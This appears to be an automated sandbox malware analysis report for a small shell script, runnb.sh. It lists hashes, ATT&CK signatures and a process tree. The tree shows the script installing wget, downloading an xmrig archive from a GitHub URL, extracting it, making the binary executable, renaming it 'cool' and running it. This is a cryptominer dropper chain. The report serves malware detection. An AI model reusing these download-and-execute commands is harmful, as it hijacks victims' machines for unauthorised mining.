Analysis
max time kernel: 60s
max time network: 63s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 30-10-2024 07:15
Static task: static1
Behavioral tasks (sample runnb.sh in every task):
behavioral1: ubuntu2204-amd64-20240611-en
behavioral2: debian12-armhf-20240221-en
behavioral3: debian12-mipsel-20240221-en
behavioral4: debian9-armhf-20240611-en
behavioral5: debian9-mipsbe-20240611-en
behavioral6: debian9-mipsel-20240611-en
behavioral7: ubuntu2004-amd64-20240611-en
behavioral8: ubuntu2204-amd64-20240611-en
behavioral9: ubuntu2404-amd64-20240523-en
General
Target: runnb.sh
Size: 213B
MD5: a1189543e2f98f6696c6d857b899ab0a
SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 1 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod (PID 771)

Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
Abuse sudo or cached sudo credentials to execute code.

Reads CPU attributes (1 TTPs, 2 IoCs)
Processes (process, description, ioc):
  exim4     File opened for reading  /sys/devices/system/cpu/online
  exim4     File opened for reading  /sys/devices/system/cpu/online

Reads runtime system information
Processes (process, description, ioc):
  tar       File opened for reading  /proc/filesystems
  sudo      File opened for reading  /proc/sys/kernel/ngroups_max
  sudo      File opened for reading  /proc/self/stat
  dpkg      File opened for reading  /proc/filesystems
  sudo      File opened for reading  /proc/filesystems
  apt       File opened for reading  /proc/self/fd
  mv        File opened for reading  /proc/filesystems
  sudo      File opened for reading  /proc/self/fd
  sendmail  File opened for reading  /proc/sys/kernel/ngroups_max
  sendmail  File opened for reading  /proc/sys/kernel/ngroups_max
  apt       File opened for reading  /proc/self/fd
  dpkg      File opened for reading  /proc/filesystems
  dpkg      File opened for reading  /proc/filesystems
  dpkg      File opened for reading  /proc/filesystems

Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
Processes (process, description, ioc):
  apt       File opened for modification  /tmp/fileutl.message.oJsfFK
  apt       File opened for modification  /tmp/fileutl.message.6V24ff
  apt       File opened for modification  /tmp/fileutl.message.I3haiP
  apt       File opened for modification  /tmp/fileutl.message.gXQoLN
  apt       File opened for modification  /tmp/fileutl.message.loMvz3
  apt       File opened for modification  /tmp/fileutl.message.ouhuJA
  apt       File opened for modification  /tmp/fileutl.message.pToxuj
  apt       File opened for modification  /tmp/fileutl.message.uSU5ko
Processes (indentation shows parent/child; format is path (PID): command line, followed by matched signatures)

/tmp/runnb.sh (PID 706): /tmp/runnb.sh
  /usr/bin/sudo (PID 709): sudo apt install wget
    - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
    - Reads runtime system information
    /usr/sbin/sendmail (PID 724): sendmail -t
      - Reads runtime system information
      /usr/sbin/exim4 (PID 737): /usr/sbin/exim4 -Mc 1t620l-0000Bg-LF
        - Reads CPU attributes
    /usr/sbin/sendmail (PID 728): sendmail -t
      - Reads runtime system information
      /usr/sbin/exim4 (PID 738): /usr/sbin/exim4 -Mc 1t620l-0000Bk-KJ
        - Reads CPU attributes
    /usr/bin/apt (PID 731): apt install wget
      - Reads runtime system information
      - Writes file to tmp directory
      /usr/bin/dpkg (PID 734): /usr/bin/dpkg --print-foreign-architectures
        - Reads runtime system information
      /usr/bin/dpkg (PID 744): /usr/bin/dpkg --print-foreign-architectures
        - Reads runtime system information
  /usr/bin/apt (PID 766): apt install wget
    - Reads runtime system information
    - Writes file to tmp directory
    /usr/bin/dpkg (PID 767): /usr/bin/dpkg --print-foreign-architectures
      - Reads runtime system information
    /usr/bin/dpkg (PID 768): /usr/bin/dpkg --print-foreign-architectures
      - Reads runtime system information
  /usr/bin/wget (PID 769): wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  /bin/tar (PID 770): tar xvf xmrigtar.tar.gz
    - Reads runtime system information
  /bin/chmod (PID 771): chmod +x xmrig
    - File and Directory Permissions Modification
  /bin/mv (PID 772): mv xmrig cool
    - Reads runtime system information
  /tmp/cool (PID 773): ./cool
Network
MITRE ATT&CK Enterprise v15
Downloads